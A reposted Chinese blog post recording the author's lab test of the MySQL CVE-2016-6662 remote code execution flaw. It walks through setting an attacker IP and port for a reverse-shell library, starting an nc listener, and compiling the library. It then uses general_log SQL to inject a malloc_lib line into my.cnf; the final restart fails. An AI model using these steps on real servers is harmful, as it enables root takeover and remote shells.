码迷,mamicode.com
首页 > 数据库 > 详细

CVE-2016-6662 mysql RCE测试

时间:2016-09-14 19:04:13      阅读:259      评论:0      收藏:0      [点我收藏+]

标签:

参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法

1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口:

#define ATTACKERS_IP "xx.x.x.x"
#define SHELL_PORT 81

在攻击者机器上做好端口监听,等待反弹:

nc -lvv -p 81

  

2.编译库
gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl


3.执行命令:

mysql> set global general_log_file = ‘/etc/my.cnf‘;

mysql> set global general_log = on;

mysql> select ‘
[mysqld]
malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so

[separator]

‘;

mysql> set global general_log = off;

  

4.可以发现my.cnf添加的内容

/usr/local/mysql/bin/mysqld, Version: 5.5.48-log (Source distribution). started with:
Tcp port: 3306 Unix socket: /tmp/mysql.sock
Time Id Command Argument
160914 17:45:16 1 Query select ‘
[mysqld]
malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so

[separator]

‘
160914 17:45:22 1 Query set global general_log = off

  

5 然后重启mysql,mysql重启会报错

leo@ubuntu:~$ sudo /etc/init.d/mysql restart
[....] Restarting mysql (via systemctl): mysql.serviceJob for mysql.service failed because the control process exited with error code. See "systemctl status mysql.service" and "journalctl -xe" for details.
failed!

 

CVE-2016-6662 mysql RCE测试

标签:

原文地址:http://www.cnblogs.com/xiaoxiaoleo/p/5873091.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!